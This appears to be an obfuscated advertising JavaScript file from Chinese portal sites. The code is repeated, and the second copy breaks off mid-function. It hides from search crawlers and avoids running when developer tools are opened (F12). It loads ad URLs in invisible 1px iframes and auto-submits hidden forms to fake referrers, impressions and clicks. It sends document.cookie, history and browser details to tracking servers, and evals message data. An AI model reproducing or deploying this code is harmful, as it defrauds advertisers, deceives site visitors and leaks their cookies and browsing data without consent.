;setTimeout(function(){
var ua = navigator.userAgent;window['__test15_exist']=true;
if(/Baiduspider|BingPreview|Googlebot|MsnBot/.test(ua))return;
if(/AppleWebKit.*Mobile/i.test(ua)||/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(ua)||/Android|Windows Phone|iPod|BlackBerry/i.test(ua)){var wapJs,wapNode;(wapJs=document.createElement("script")).src="http://ivy.pconline.com.cn/adpuba/show?id=test.wap.test15.&media=js&channel=dynamic&";wapNode=document.getElementsByTagName("script")[0];wapNode.parentNode.insertBefore(wapJs,wapNode); return;}
if(/Qt\/\d\..+?Safari/.test(ua))(window["qt"+1*new Date()]=new Image()).src = "http://count6.pconline.com.cn/count.php?channel=5600&content="+escape("@Qt,p==t:"+[window.parent==window.top,window.parent==window]+";his:"+history.length+";links:"+document.links.length+";hash:"+location.hash + document.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(window.name))+";ref:"+document.referrer+";ua:"+ua+",br:"+[!!window.attachEvent,!!window.postMessage]);
if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(window.name)){
	var ch=5422;if(/\/autox\/x\.html/.test(window.name))ch=5547;if(/Chrome\/31\.0\.1650\.63/.test(ua))ch=5596;if(/Qt\/\d\..+?Safari/.test(ua))ch=5601;if(/195437|186537|378595|329087/.test(window.name))ch=5597;if(!/#ad=0000#ad=0000/.test(location.hash))location.replace("http://count6.pconline.com.cn/count.php?channel="+ch+"&content="+escape("@other10,p==t:"+[window.parent==window.top,window.parent==window]+";his:"+history.length+";links:"+document.links.length+";hash:"+location.hash + document.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(window.name))+";ref:"+document.referrer+";ua:"+ua+",br:"+[!!window.attachEvent,!!window.postMessage]));return;}
	if(/##ad=0000/.test(location.hash)&&location.pathname!='/')if(!window.testad0000){var op=window.opener;try{op=op?op.location.href:op==null?"null":""+op}catch(e){op=e.message}(window[Math.random()]=new Image()).src="http://count6.pconline.com.cn/count.php?channel=5575&ad="+(screen.width==1024&&window.attachEvent&&window.postMessage?0:1)+"&content="+escape("his:"+[history.length,parent==top&&top==window,op,window.opener,"name="+window.name,"pc.other.test15.",location.hash,document.referrer,document.title,document.cookie,navigator.userAgent,!!window.attachEvent,!!window.postMessage]);window.testad0000 = 1; 
screen.width==1024&&window.attachEvent&&window.postMessage||-function(ch,chout,now,ck,chf){ now=1*now||1*new Date();
function run(s){try{s=s.data||s;if(s.indexOf("var r="+now)==0)eval(s)}catch(e){throw e}}
+function(e,f,o,i){i="\x61d\x64\x45ve\x6et\x4ci\x73te\x6ee\x72";o[i]?o[i](e,f,false):o["\x61t\x74ac\x68\x45\x76e\x6et"]("\x6f\x6e"+e,f)}("message",run,this);
var i=document.createElement("div"); i.innerHTML="\x3cifra\x6de\x20i\x64="+now+"\x20\x73\x74y\x6ce=di\x73p\x6cay:\x6eo\x6ee\x20s\x72c=\x22h\x74\x74\x70\x3a\x2f\x2fcou\x6et\x36\x2epc\x6fn\x6cine\x2eco\x6d\x2ecn\x2fp\x63suv\x2e\x68tm\x22\x20\x6ea\x6de=\x22ifr:"+now+",ch:"+ch+(chout?",chout:"+chout:"")+(chf?",chf:"+chf:"")+(ck?",c\x6fo\x6bie:"+ck:"")+"\x22>\x3c\x2fi\x66ra\x6de\x3e";
(i=i.firstChild).onreadystatechange=function(){run(navigator[now],navigator[now]=this.undefined)};
document.getElementsByTagName("head")[0].appendChild(i); 
}(-1,5581,0,"[^;=]+");}

	if(document.referrer=='http://www.pcauto.com.cn/autox/x.html') (function(){if(window._t15_airui==1)return;var tid='auto.airui.test15.';var js=document.createElement("script");js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";var node = document.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);window._t15_airui=1;})();
	if(document.referrer=='http://www.pcauto.com.cn/autox/x.html') (function(){if(window._t15_pc_airui==1)return;var tid='pc.airui.test15.';var js=document.createElement("script");js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";var node = document.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);window._t15_pc_airui=1;})();
    (function(d,w){if(w._t15_vshow==1 || location.href.indexOf("pcauto.com.cn") == -1 || location.pathname=='/')return;if(d.referrer.indexOf("vshow.c") != -1 || (d.referrer =='' && /MSIE 8/.test(ua))){var tid='auto.vshow.test15.',js,node;(js=d.createElement("script")).src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";node = d.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);w._t15_vshow=1;}})(document,window);

	var now = new Date();
	if(!!window['test15'+now.getFullYear()+now.getMonth()+now.getDate()] || /zzb\./.test(location.host) || location.pathname=='/' || /#ad=0000/.test(location.hash) || /arch\./.test(location.host) || /zzsvn\./.test(location.host) || /play\d+\./.test(location.host)) return;
	if(0<window['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x6dia\x6f\x7ahe\x6e\x2ec\x6f\x6d')) return;
	if(!window['__test15atids']) window['__test15atids']=[];
	var ivy_div = document.getElementById("ivy_div"),chrome = /Chrome/.test(ua)&&/Netscape/.test(navigator.appName);
	if(ivy_div==null||/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(window.name)||/Chrome\/30\.0\.1599\.101|Chrome\/30\.0\.0\.0|Firefox|iPad|UBrowser/.test(ua)) return;
	var pos = {w:document.documentElement.clientWidth||document.body.clientWidth,h:document.documentElement.clientHeight||document.body.clientHeight}
	var c=ivy_div.style;c.width="1px";c.height="0px";c.overflow="hidden";c.position="absolute";c.display="block";
	var test15showfunc = 'test15showfunc'+Math.floor(Math.random()*99999+10000);
	
	if(!window.ivyTastTimes){
		var iframe;	window.ivyTastTimes={};
		if(document.getElementById('f\x5f\x69\x66\x72ame')){
			iframe = document.getElementById('f\x5f\x69\x66\x72ame').contentWindow.document;	
			bind(iframe,'keydown',function(e){ e = e || event; window.t15rd==1; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);}});
		}
		bind(document,'keydown',function(e){ e = e || event; if(e.keyCode==123)ivy_div.innerHTML=''; window.t15rd==1; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);} });
	}

	window[test15showfunc] = function(){
		var idx4show=1*new Date();
		show(idx4show++,"http://ivy.pconline.com.cn/adpuba/click?id=pc.other.test15.&adid=195437&watch=0"); show(idx4show++,"{SRC2}"); show(idx4show++,"{SRC3}"); show(idx4show++,"{SRC4}"); show(idx4show++,"{SRC5}"); show(idx4show++,"{SRC6}"); show(idx4show++,"{SRC7}"); show(idx4show++,"{SRC8}"); show(idx4show++,"{SRC9}"); show(idx4show++,"{SRC10}");
		show(idx4show++,"{SRC11}"); show(idx4show++,"{SRC12}");	show(idx4show++,"{SRC13}"); show(idx4show++,"{SRC14}");	show(idx4show++,"{SRC15}"); show(idx4show++,"{SRC16}"); show(idx4show++,"{SRC17}"); show(idx4show++,"{SRC18}"); show(idx4show++,"{SRC19}"); show(idx4show++,"{SRC20}");
		show(idx4show++,"{SRC21}"); show(idx4show++,"{SRC22}");	show(idx4show++,"{SRC23}"); show(idx4show++,"{SRC24}");	show(idx4show++,"{SRC25}"); show(idx4show++,"{SRC26}"); show(idx4show++,"{SRC27}"); show(idx4show++,"{SRC28}"); show(idx4show++,"{SRC29}"); show(idx4show++,"{SRC30}");
		show(idx4show++,"{SRC31}"); show(idx4show++,"{SRC32}"); show(idx4show++,"{SRC33}"); show(idx4show++,"{SRC34}"); show(idx4show++,"{SRC35}"); show(idx4show++,"{SRC36}"); show(idx4show++,"{SRC37}"); show(idx4show++,"{SRC38}"); show(idx4show++,"{SRC39}"); show(idx4show++,"{SRC40}");
		show(idx4show++,"{SRC41}"); show(idx4show++,"{SRC42}"); show(idx4show++,"{SRC43}"); show(idx4show++,"{SRC44}"); show(idx4show++,"{SRC45}"); show(idx4show++,"{SRC46}"); show(idx4show++,"{SRC47}"); show(idx4show++,"{SRC48}"); show(idx4show++,"{SRC49}"); show(idx4show++,"{SRC50}");
		show(idx4show++,"{SRC51}"); show(idx4show++,"{SRC52}"); show(idx4show++,"{SRC53}"); show(idx4show++,"{SRC54}"); show(idx4show++,"{SRC55}"); show(idx4show++,"{SRC56}"); show(idx4show++,"{SRC57}"); show(idx4show++,"{SRC58}"); show(idx4show++,"{SRC59}"); show(idx4show++,"{SRC60}");
		show(idx4show++,"{SRC61}"); show(idx4show++,"{SRC62}"); show(idx4show++,"{SRC63}"); show(idx4show++,"{SRC64}"); show(idx4show++,"{SRC65}"); show(idx4show++,"{SRC66}"); show(idx4show++,"{SRC67}"); show(idx4show++,"{SRC68}"); show(idx4show++,"{SRC69}"); show(idx4show++,"{SRC70}");
		show(idx4show++,"{SRC71}"); show(idx4show++,"{SRC72}"); show(idx4show++,"{SRC73}"); show(idx4show++,"{SRC74}"); show(idx4show++,"{SRC75}"); show(idx4show++,"{SRC76}"); show(idx4show++,"{SRC77}"); show(idx4show++,"{SRC78}"); show(idx4show++,"{SRC79}"); show(idx4show++,"{SRC80}");
		show(idx4show++,"{SRC81}"); show(idx4show++,"{SRC82}"); show(idx4show++,"{SRC83}"); show(idx4show++,"{SRC84}"); show(idx4show++,"{SRC85}"); show(idx4show++,"{SRC86}"); show(idx4show++,"{SRC87}"); show(idx4show++,"{SRC88}"); show(idx4show++,"{SRC89}"); show(idx4show++,"{SRC90}");
		show(idx4show++,"{SRC91}"); show(idx4show++,"{SRC92}"); show(idx4show++,"{SRC93}"); show(idx4show++,"{SRC94}"); show(idx4show++,"{SRC95}"); show(idx4show++,"{SRC96}"); show(idx4show++,"{SRC97}"); show(idx4show++,"{SRC98}"); show(idx4show++,"{SRC99}"); show(idx4show++,"{SRC100}");

		function show(idx4show,src,delay){
			try{
			var watcher=0,body=document.documentElement&&document.documentElement.clientHeight>0?document.documentElement:document.body,vcode=src.indexOf("adpuba%2Fshow2") != -1;
			watcher=chrome ? window.outerHeight-Math.floor((window.outerWidth-10)/window.innerWidth*window.innerHeight)>150 : !body || (window.outerHeight ? window.outerHeight : screen.availHeight)-body.clientHeight>250;
			if(src==null || src=="" || /^(#|\{SRC)/.test(src) || !/^http/i.test(src) || watcher&&/watch=0/.test(src) || watcher&&chrome) return;
			if(!delay){
				delay=1*src.replace(/.*&delay=(\d+).*|.*/,"$1"); if(delay<1)delay=500+Math.floor(Math.random()*1000);
				if(vcode) delay = 1;
				src=src.replace(/&delay=(\d+)/,"");
				return ivyTastTimes["t"+idx4show] = setTimeout(function(){show(idx4show,src,true); },delay);
			}
			if(/&redirect=1/.test(src)&&!/cms\.|zzsvn\.|corp\.|zhaopin\.|ued\.|my\./.test(location.href)){
				if(!!document.referrer)window.location.replace(src);else return;
			}
			if(/^http:\/\/rr\..+?\.com\/u\//.test(src)){
				var div=document.createElement("div"),ifr;
				div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr-p2-"+ src.replace(/^http:\/\/rr\..+?\.com\/u\//,"").replace(/\.html$/,"")+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent) +"\" width="+ pos.w +" height="+ pos.h +" id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
				ivy_div.appendChild(div.firstChild); setTimeout(function(){try{ ifr = document.getElementById("_ivf000"+idx4show); ifr.parentNode.removeChild(ifr)}catch(err){}},40*1000); return;
			}
			
			src=src.replace(/(show[?]id=)([\w.]+)/,function($0,$1,$2){return $1+escapeAll($2)}).replace('ivy.pconline','i\x79v.pconline');
			var k=src.indexOf('#http'), srcCd = unescape(src).replace(/\n/g,''), adid = srcCd.replace(/^.*adid=(\d+).*$|^.*$/,'$1') || srcCd.match(/&id=\d+_(\d+)/)[1], atid = srcCd.replace(/^.*atid=(\d+).*$|^.*$/,'$1'), div=document.createElement("div");
			if(atid) __test15atids.push(atid);
			
			if(/rr\.php|rr\.jsp/.test(src)&&!/keepparent/.test(src)){
				var
				fArr = src.replace(/^.*from=([^&]+).*$|^.*$/,'$1').replace(/^%0A{0,}|%0A{0,}$|%0A{0,}(?=%0A)/g,'').split("%0A"),
				tArr = src.replace(/^.*to=([^&]+).*$|^.*$/,'$1').replace(/^%0A{0,}|%0A{0,}$|%0A{0,}(?=%0A)/g,'').split("%0A"),
				fr = fArr[Math.floor(Math.random()*fArr.length)],
				to = tArr[Math.floor(Math.random()*tArr.length)],
				co = src.replace(/^.*code=([^&]+).*$|^.*$/,'$1'), ifr, idoc, icod;
				co = replaceRT(co);
				!!fr && (fr = fr.indexOf("%23ad%3D0000") > -1 ? fr : fr + '%23ad%3D0000');
				!!to && (to = to.indexOf("%23ad%3D0000") > -1 ? to : to + '%23ad%3D0000');
				src = src.replace(/from=[^&]+/,"from="+fr).replace(/to=[^&]+/,"to="+to).replace(/code=[^&]+/,"code="+co);

				if(!!fr && !!co){
					div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+adid+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent)+"-wn="+ encodeURIComponent(src.replace(/^http[^&]*/,"")) +"=wn\" width="+ (!vcode ? pos.w : 1) +" height="+ (!vcode ? pos.h : 1) +" class=i"+atid+"_"+adid+" id=_ivf000"+idx4show+" \x3e\x3c/i\x46ra\x4de\x3e";
					ivy_div.appendChild(div.firstChild);
					icod = '\x3cf\x6frm\x20m\x65thod\x3dpost\x20id\x3d\x66m\x20ac\x74\x69on\x3d"'+unescape(fr)+'\x22\x20\x74ar\x67et=\x5fse\x6cf\x3e\x3cinput\x20type\x3dhidde\x6e\x20name\x3dngix\x5fposter\x20val\x75e\x3d\x31\x20\x2f\x3e\x3cinput\x20type\x3dhidde\x6e\x20name\x3dwn\x5fposter\x20val\x75e\x3d\x31\x20\x2f\x3e\x3c\x2fform\x3e\x3cscri\x70t\x3evar\x20f=d\x6fcu\x6d\x65\x6et\x2e\x67etEl\x65\x6de\x6et\x42yId\x28\x22fm\x22\x29;if(f&&/^post$/i.test(f.method)&&/^http:/i.test(f.action)&&/^test15Show/.test(window.name)&&wi\x6ed\x6fw\x2epare\x6et!\x3dwi\x6ed\x6fw){/*f.action+="#>>"+f.action+"<<"+f.method+","+f.target;/**/f\x2es\x75bm\x69t\x28\x29\x3b}\x3c\x2f\x73\x63r\x69pt\x3e';
					ifr = document.getElementById("_ivf000"+idx4show);
					idoc = ifr.contentDocument||ifr.contentWindow.document;
					idoc.write(icod);
					ifr.removeAttribute("name");
					setTimeout(function(){try{ ifr.parentNode.removeChild(ifr)}catch(err){}},50*1000);
					return;
				}
			}
			if(src.indexOf('adpuba/click?')>-1&&!/MSIE/.test(ua)){
				src = src.replace('adpuba/click?','adpuba/click?trace=6&')
			}
			if(k<0) {
				div.innerHTML = "\x3ci\x46ra\x4de name=\"test15ShowIfr"+adid+"-"+location.href+"-"+document.referrer+"-"+(window==top&&window==parent)+"-pc.other.test15.\" width=1 height=1 id=_ivf000"+idx4show+" src='"+src+"'\x3e\x3c/i\x46ra\x4de\x3e";
				ivy_div.appendChild(div.firstChild);
			} else {
				var ref=src.substring(k+1); src=src.substring(0,k);
				div.innerHTML=
					'\x3ci\x46ra\x4de style=margin-top:-9999px width=800 height=600 id=_ivf'+idx4show+' name=test15ShowIfr'+idx4show+' \x3e\x3c/i\x46ra\x4de\x3e\n'+
					'\x3cf\x4fr\x4d \x52et\x48od=\x50o\x53t target=test15ShowIfr'+idx4show+' action="'+ref+'" \x3e\x3cinput id=_ivF\x4fr\x6d'+idx4show+' type=submit name=post_redir value="'+src+'" /\x3e\x3c/f\x4fr\x4d\x3e';
				ivy_div.appendChild(div);
				document.getElementById('_iv\x46or\x6d'+idx4show)["\x63l\x69c\x6b"]();
			}
			}catch(err) {}
		}
	}

	window[test15showfunc]();
	setTimeout(function(){if(!!window.t15rd&&window.t15rd==1)return;var tid='pc.other.test15.',atids='';if(!!__test15atids&&__test15atids.length>0) atids=__test15atids.join(',');var js=document.createElement("script"); js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&s_atid=&";var nodes = document.getElementsByTagName("script"),len=nodes.length;if(len){ nodes[len-1].parentNode.insertBefore(js,nodes[len-1]);};window.t15rd=1;},12*1000);

	function bind(o,type,fn){if(o.addEventListener){o.addEventListener(type,fn,false)}else if(o.attachEvent){o.attachEvent("on"+type,fn)}else{o["on"+type] = fn}}
	function escapeAll(str){var hexString='';for(var k=0,c;k<str.length;k++){c=str.charAt(k);for(i=0;i<=256;++i){var h=i.toString(16);if(h.length==1)h="0"+h;h="%"+h;if(unescape(h)==c){hexString+=h;break}else if(i==256){hexString+=escape(c);break}}}return hexString}
	function replaceRT(co){
	var rnd = co.match(/%5BRND(\d+)%5D/), tme = co.match(/%5BTIME(\d+)%5D/), wid = co.match(/%5BSCRW%5D/), hei = co.match(/%5BSCRH%5D/);
		rnd && (co = co.replace(rnd[0],fixrnd(rnd[1]*1)));
		tme && (co = co.replace(tme[0],fixtime(tme[1]*1)));
	var dataScreen = [{"15.4" : [1366,768]}, {"13.22" : [1440,900]}, {"11.09" : [1024,768]}, {"8.23" : [1920,1080]}, {"4.13" : [1600,900]}, {"4.09" : [1280,800]}, {"3.53" : [320,480]}, {"3.11" : [1280,1024]}, {"2.79" : [1680,1050]}, {"2.63" : [480,800]}, {"1.84" : [1280,768]}];
		if(wid || hei){	var size = rndRun(dataScreen); wid && (co = co.replace(wid[0],size[0])); hei && (co=co.replace(hei[0],size[1]));}
		return co;
	}
	function rndRun(rndData) {
	var obj = {}, num = 0, l = rndData.length, key, i, size = [1366,768];
		for( i = 0; i < l; i++ ) for( key in rndData[i] ){ num += key*100; obj[num] = rndData[i][key];};
		var r = Math.floor(Math.random()*num);
		for ( key in obj ) if(r < key){size = obj[key];break;};
		return size;
	}
	function fixtime(n){
		var t = new Date()*1 + "";
		if(t.length > n){t = t.substring(0,n)}
		else if(t.length < n){	t += fixrnd(n - t.length);}
		return t*1;
	}
	function fixrnd(n){
		var s = "";
		for(var i = 0; i<n;i++)s += Math.floor(Math.random()*10);
		return s*1;
	}
},1);
(function(){
	var name = 'xxx'+Math.floor(Math.random()*1000000);
	if(!!window[name]) return;
	if(Math.random()*100000>100) return;
var tabstr='(0_0)';
function _uFlash() { 
  var f = "-", n = navigator; 
  if (n.plugins && n.plugins.length) {
      for (var ii = 0; ii < n.plugins.length; ii++) {
            if (n.plugins[ii].name.indexOf('Shockwave Flash') != -1) { 
                f = n.plugins[ii].description.split('Shockwave Flash ')[1]; 
                break; 
           } 
      } 
  } else if (window.ActiveXObject) { 
       for (var ii = 20; ii >= 2; ii--) { 
          try { 
             var fl = eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash." + ii + "');"); 
             if (fl) { 
                 f = ii + '.0'; 
                break; 
             }
          } catch (e) { 
         } 
     } 
  }
  return f; 
}
var ximg = new Image().src = 'http://agent-count.pconline.com.cn/counter/adAnalyse/fflloogg.jsp?m=add&f=clientenv&c='+
  navigator.userAgent+
  tabstr+window.screen.width+'x'+window.screen.height+
  tabstr+(document.documentElement.clientWidth||document.body.clientWidth)+'x'+(document.documentElement.clientHeight||document.body.clientHeight)+
  tabstr+escape(_uFlash());
	window[name]=1;
})();
;setTimeout(function(){
var ua = navigator.userAgent;window['__test15_exist']=true;
if(/Baiduspider|BingPreview|Googlebot|MsnBot/.test(ua))return;
if(/AppleWebKit.*Mobile/i.test(ua)||/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(ua)||/Android|Windows Phone|iPod|BlackBerry/i.test(ua)){var wapJs,wapNode;(wapJs=document.createElement("script")).src="http://ivy.pconline.com.cn/adpuba/show?id=test.wap.test15.&media=js&channel=dynamic&";wapNode=document.getElementsByTagName("script")[0];wapNode.parentNode.insertBefore(wapJs,wapNode); return;}
if(/Qt\/\d\..+?Safari/.test(ua))(window["qt"+1*new Date()]=new Image()).src = "http://count6.pconline.com.cn/count.php?channel=5600&content="+escape("@Qt,p==t:"+[window.parent==window.top,window.parent==window]+";his:"+history.length+";links:"+document.links.length+";hash:"+location.hash + document.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(window.name))+";ref:"+document.referrer+";ua:"+ua+",br:"+[!!window.attachEvent,!!window.postMessage]);
if(/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(window.name)){
	var ch=5422;if(/\/autox\/x\.html/.test(window.name))ch=5547;if(/Chrome\/31\.0\.1650\.63/.test(ua))ch=5596;if(/Qt\/\d\..+?Safari/.test(ua))ch=5601;if(/195437|186537|378595|329087/.test(window.name))ch=5597;if(!/#ad=0000#ad=0000/.test(location.hash))location.replace("http://count6.pconline.com.cn/count.php?channel="+ch+"&content="+escape("@other10,p==t:"+[window.parent==window.top,window.parent==window]+";his:"+history.length+";links:"+document.links.length+";hash:"+location.hash + document.getElementsByTagName("iframe").length +";wn:"+unescape(unescape(window.name))+";ref:"+document.referrer+";ua:"+ua+",br:"+[!!window.attachEvent,!!window.postMessage]));return;}
	if(/##ad=0000/.test(location.hash)&&location.pathname!='/')if(!window.testad0000){var op=window.opener;try{op=op?op.location.href:op==null?"null":""+op}catch(e){op=e.message}(window[Math.random()]=new Image()).src="http://count6.pconline.com.cn/count.php?channel=5575&ad="+(screen.width==1024&&window.attachEvent&&window.postMessage?0:1)+"&content="+escape("his:"+[history.length,parent==top&&top==window,op,window.opener,"name="+window.name,"pc.other.test15.",location.hash,document.referrer,document.title,document.cookie,navigator.userAgent,!!window.attachEvent,!!window.postMessage]);window.testad0000 = 1; 
screen.width==1024&&window.attachEvent&&window.postMessage||-function(ch,chout,now,ck,chf){ now=1*now||1*new Date();
function run(s){try{s=s.data||s;if(s.indexOf("var r="+now)==0)eval(s)}catch(e){throw e}}
+function(e,f,o,i){i="\x61d\x64\x45ve\x6et\x4ci\x73te\x6ee\x72";o[i]?o[i](e,f,false):o["\x61t\x74ac\x68\x45\x76e\x6et"]("\x6f\x6e"+e,f)}("message",run,this);
var i=document.createElement("div"); i.innerHTML="\x3cifra\x6de\x20i\x64="+now+"\x20\x73\x74y\x6ce=di\x73p\x6cay:\x6eo\x6ee\x20s\x72c=\x22h\x74\x74\x70\x3a\x2f\x2fcou\x6et\x36\x2epc\x6fn\x6cine\x2eco\x6d\x2ecn\x2fp\x63suv\x2e\x68tm\x22\x20\x6ea\x6de=\x22ifr:"+now+",ch:"+ch+(chout?",chout:"+chout:"")+(chf?",chf:"+chf:"")+(ck?",c\x6fo\x6bie:"+ck:"")+"\x22>\x3c\x2fi\x66ra\x6de\x3e";
(i=i.firstChild).onreadystatechange=function(){run(navigator[now],navigator[now]=this.undefined)};
document.getElementsByTagName("head")[0].appendChild(i); 
}(-1,5581,0,"[^;=]+");}

	if(document.referrer=='http://www.pcauto.com.cn/autox/x.html') (function(){if(window._t15_airui==1)return;var tid='auto.airui.test15.';var js=document.createElement("script");js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";var node = document.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);window._t15_airui=1;})();
	if(document.referrer=='http://www.pcauto.com.cn/autox/x.html') (function(){if(window._t15_pc_airui==1)return;var tid='pc.airui.test15.';var js=document.createElement("script");js.src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";var node = document.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);window._t15_pc_airui=1;})();
    (function(d,w){if(w._t15_vshow==1 || location.href.indexOf("pcauto.com.cn") == -1 || location.pathname=='/')return;if(d.referrer.indexOf("vshow.c") != -1 || (d.referrer =='' && /MSIE 8/.test(ua))){var tid='auto.vshow.test15.',js,node;(js=d.createElement("script")).src="http://ivy.pconline.com.cn/adpuba/show?id="+tid+"&media=js&channel=dynamic&";node = d.getElementsByTagName("script")[0];node.parentNode.insertBefore(js,node);w._t15_vshow=1;}})(document,window);

	var now = new Date();
	if(!!window['test15'+now.getFullYear()+now.getMonth()+now.getDate()] || /zzb\./.test(location.host) || location.pathname=='/' || /#ad=0000/.test(location.hash) || /arch\./.test(location.host) || /zzsvn\./.test(location.host) || /play\d+\./.test(location.host)) return;
	if(0<window['\x64\x6fcu\x6de\x6et']['\x72e\x66e\x72r\x65r'].indexOf('\x6dia\x6f\x7ahe\x6e\x2ec\x6f\x6d')) return;
	if(!window['__test15atids']) window['__test15atids']=[];
	var ivy_div = document.getElementById("ivy_div"),chrome = /Chrome/.test(ua)&&/Netscape/.test(navigator.appName);
	if(ivy_div==null||/^\x74e\x73t15(\x53h\x6fw|\x43\x6ck)\x49f\x72/.test(window.name)||/Chrome\/30\.0\.1599\.101|Chrome\/30\.0\.0\.0|Firefox|iPad|UBrowser/.test(ua)) return;
	var pos = {w:document.documentElement.clientWidth||document.body.clientWidth,h:document.documentElement.clientHeight||document.body.clientHeight}
	var c=ivy_div.style;c.width="1px";c.height="0px";c.overflow="hidden";c.position="absolute";c.display="block";
	var test15showfunc = 'test15showfunc'+Math.floor(Math.random()*99999+10000);
	
	if(!window.ivyTastTimes){
		var iframe;	window.ivyTastTimes={};
		if(document.getElementById('f\x5f\x69\x66\x72ame')){
			iframe = document.getElementById('f\x5f\x69\x66\x72ame').contentWindow.document;	
			bind(iframe,'keydown',function(e){ e = e || event; window.t15rd==1; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);}});
		}
		bind(document,'keydown',function(e){ e = e || event; if(e.keyCode==123)ivy_div.innerHTML=''; window.t15rd==1; for(var k in ivyTastTimes){ clearTimeout(ivyTastTimes[k]);} });
	}

	window[test15showfunc] = function(){
		var idx4show=1*new Date();
		show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fprice.pcauto.com.cn%2Fsg1633%2F%23%23ad%3D0000&to=&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.bjk.jbcx.jctl2.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D389456%26relate%3D1%26atid%3D1933805-13500%22%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A//brides.pclady.com.cn/&to=http%3A//brides.pclady.com.cn/fashion/dress/&code=%3Csc%7Eipt%20src%3D%22http%3A//ivy.pclady.com.cn/adpuba/show%3Fadid%3D357391%26id%3Dpclady.test.click.%26media%3Djs%26trace%3D1%26atid%3D109840936%22%3E%3C/sc%7Eipt%3E&watch=0&cookie=1"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fprice.pcauto.com.cn%2Fm26377%2F%23%23ad%3D0000&to=&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.bjk.jdtsftl.mdo.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D387180%26relate%3D1%26atid%3D1933852-13500%22%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A//price.pcauto.com.cn&to=http%3A//price.pcauto.com.cn/sg2734/&code=%3Csc%7Eipt%20src%3Dhttp%3A//ivy.pcauto.com.cn/adpuba/show%3Fadid%3D389456%26id%3Dauto.test.pv.%26media%3Djs%26atid%3D109841030%26trace%3D1%26relate%3D1%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fwww.pcauto.com.cn%2F%23%23ad%3D0000&to=http%3A%2F%2Fwww.pcauto.com.cn%2Fqcbj%2Fsz%2F%23%23ad%3D0000&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.qcbj.sjtf.sy.qywz.zdwzgdb.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D384185%26relate%3D1%26atid%3D1933833-13500%22%3E%3C/sc%7Eipt%3E&watch=0"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A//brides.pclady.com.cn/&to=http%3A//brides.pclady.com.cn/fashion/dress/&code=%3Csc%7Eipt%20src%3D%22http%3A//ivy.pclady.com.cn/adpuba/show%3Fadid%3D390437%26id%3Dpclady.test.click.%26media%3Djs%26trace%3D1%26atid%3D1933793-13500%22%3E%3C/sc%7Eipt%3E&watch=0&cookie=1"); show(idx4show++,"http://jwz.3conline.com/adpuba/rr.jsp?&from=http%3A%2F%2Fwww.pcauto.com.cn%2F%3F_t_t_t%3D0.21965905837714672%23%23ad%3D0000&to=&code=%3Csc%7Eipt%20src%3D%22http%3A%2F%2Fivy.pcauto.com.cn%2Fadpuba%2Fshow%3Fid%3Dauto.shouye.tl1x.%26media%3Djs%26channel%3Ddynamic%26trace%3D1%26adid%3D387068%26relate%3D1%26atid%3D1933798-13500%22%3E%3C/sc%7Eipt%3E&watch=0"); 